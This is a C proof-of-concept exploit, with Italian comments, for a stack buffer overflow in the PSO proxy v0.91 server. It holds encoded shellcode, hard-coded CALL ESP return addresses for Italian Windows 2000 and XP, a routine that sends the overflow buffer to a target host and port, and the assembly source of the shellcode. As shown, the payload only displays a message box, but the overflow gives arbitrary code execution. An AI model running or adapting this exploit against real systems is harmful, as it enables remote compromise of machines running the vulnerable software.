/************************************************************\
* PSO v0.91 PoC - Proof of Concept code *
* by NoRpiUs *
* *
* *
* web: www.norpius.tk *
* email: norpius@altervista.org *
* Url del programma: http://psoproxy.sourceforge.net *
* *
\************************************************************/
#include <stdio.h>
#ifdef WIN32
#include <winsock.h>
#include <windows.h>
#define close closesocket
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#endif
#define CALL_ESP_2K "\xB8\x64\x75\x71"
#define CALL_ESP_XP "\xC1\x1C\x35\x77"
char shellcode[] =
// My shellcode :) - xorato con 0x80 :)
// Fa apparire una MessageBoxA con la scritta "NoRpiUs w4s h3r3"
"\xEB\x0F\x58\x80\x30\x80\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05"
"\xE8\xEC\xFF\xFF\xFF\x6B\xB8\xDF\x0D\xF7\xB6\xD6\x7F\x95\xEC\x30\xC1"
"\x80\x0D\xF7\x8D\xD6\xD0\x7F\x95\x5C\x30\xC1\x80\x0D\xF7\x99\x0D\xDF"
"\xC1\xB1\x49\xD1\xD3\xD6\xD1\x7F\x50\xD7\x7F\x95\xEC\x30\xC1\x80\x0D"
"\xF7\xAA\xD6\xD0\x7F\x95\x5C\x30\xC1\x80\x7F\x50\x68\x43\x7F\x7F\x7F"
"\xEB\xE5\xF2\xEE\xE5\xEC\xB3\xB2\xAE\xE4\xEC\xEC\x80\xCD\xE5\xF3\xF3"
"\xE1\xE7\xE5\xC2\xEF\xF8\xC1\x80\xCE\xEF\xD2\xF0\xE9\xD5\xF3\xA0\xF7"
"\xB4\xF3\xA0\xE8\xB3\xF2\xB3\x80\xC5\xF8\xE9\xF4\xD0\xF2\xEF\xE3\xE5"
"\xF3\xF3\x80\xF5\xF3\xE5\xF2\xB3\xB2\xAE\xE4\xEC\xEC\x80\xBA\xA9\x80"
"\x68\x61s\x63\x6B\x90\r\n";
void errore( char *err )
{
printf("%s",err);
exit(1);
}
void banner(void)
{
fputs("\n\tPSO PoC\n"
"\tBy NoRpiUs\n"
"\tweb: www.norpius.tk\n"
"\temail: norpius@altervista.org\n\n", stdout);
}
void uso( char *progz )
{
fputs("\tUso: <host> <porta> <target>\n\n"
"\tTarget: \n"
"\t1 = Win 2K ITA \n"
"\t2 = Win XP ITA \n", stdout);
exit(1);
}
int main( int argc, char *argv[] )
{
int sock;
struct hostent *he;
struct sockaddr_in target;
unsigned char evilbuff[1530];
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(2,0), &wsadata);
#endif
banner();
if ( argc < 3 ) uso(argv[0]);
if ( (he = gethostbyname(argv[1])) == NULL )
errore("\t[-] Impossibile risolvere l'host\n");
target.sin_family = AF_INET;
target.sin_addr = *(( struct in_addr *) he -> h_addr );
target.sin_port = htons(atoi(argv[2]));
fputs("\t[+] Preparazione del buffer...\n", stdout);
memset(evilbuff, 0x41, 1040 );
switch(argv[3][0])
{
case '1': memcpy(evilbuff + 1024, CALL_ESP_2K, 4); break;
case '2': memcpy(evilbuff + 1024, CALL_ESP_XP, 4); break;
default : errore("\t[-] Target sbagliato\n");
}
memcpy(evilbuff + 1040, shellcode, sizeof(shellcode));
fputs("\t[+] Connessione...\n", stdout);
if ( (sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP )) < 0 )
errore("\t[-] Impossibile creare socket\n");
if ( connect(sock, (struct sockaddr *) &target, sizeof(target)) < 0 )
errore("\t[-] Connessione fallita\n");
if ( send( sock, evilbuff, sizeof(evilbuff), 0) < 0 )
errore("\t[-] Impossibile spedire il buffer\n");
close(sock);
fputs("\t[+] Buffer spedito!\n", stdout);
fputs("\t[+] Ora la MessageBox dovrebbe essere apparsa :)\n\n", stdout);
return(0);
}
/***************** SHELLCODE *******************\
;Questo shellcode e' universale in quanto incula
;gli address delle call dal pso :D
BITS 32
jmp short data
next:
pop edi
lea esi, [edi+54]
push esi
call [0041b06ch] ;LoadLibraryA("user32.dll")
lea esi, [edi+13]
push esi
push eax
call [0041b0dch] ;GetProcAddress(user32.dll, "MessageBoxA")
lea esi, [edi+25]
lea ebx, [edi+64]
xor ecx, ecx
push ecx
push esi
push ebx
push ecx
call eax ;MessageBoxA(0, "NoRpiUs w4s h3r3", ":)", MB_OK)
push edi
call [0041b06ch] ;LoadLibraryA("kernel32.dll")
lea esi, [edi+42]
push esi
push eax
call [0041b0dch] ;GetProcAddress(kernel32.dll, "ExitProcess")
call eax ;ExitProcess(0)
data:
call next
db 'kernel32.dll',0 ; +0 bytes
db 'MessageBoxA',0 ; +13 bytes
db 'NoRpiUs w4s h3r3',0 ; +25 bytes
db 'ExitProcess',0 ; +42 bytes
db 'user32.dll',0 ; +54 bytes
db ':)',0 ; +64 bytes
\***************** END SHELLCODE ***************/
|
